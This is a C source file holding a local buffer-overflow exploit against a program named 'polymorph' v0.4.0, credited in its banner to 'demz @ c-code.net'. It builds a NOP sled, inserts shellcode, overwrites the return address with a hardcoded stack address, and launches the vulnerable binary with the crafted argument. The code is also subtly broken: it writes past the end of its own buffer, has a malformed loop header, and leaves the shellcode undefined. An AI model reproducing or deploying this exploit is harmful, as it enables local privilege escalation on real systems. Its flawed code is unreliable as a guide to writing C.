
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int buffer ;


 int execl (char*,char*,char*,char*,int *) ;
 int memset (char*,int,int) ;
 int printf (char*) ;
 char* shellcode ;
 int strlen (char*) ;

int main()
{
        unsigned long ret = 0xbffff3f0;

        char buffer[2076];
        int i=0;

        memset(buffer, 0x90, sizeof(buffer));

        for (0; i < strlen(shellcode) - 1;i++)
        buffer[1000 + i] = shellcode[i];

        buffer[2076] = (ret & 0x000000ff);
        buffer[2077] = (ret & 0x0000ff00) >> 8;
        buffer[2078] = (ret & 0x00ff0000) >> 16;
        buffer[2079] = (ret & 0xff000000) >> 24;
        buffer[2080] = 0x0;

        printf("\nPolymorph v0.4.0 local exploit\n");
        printf("---------------------------------------- demz @ c-code.net --\n");

        execl("./polymorph", "polymorph", "-f", buffer, ((void*)0));
}
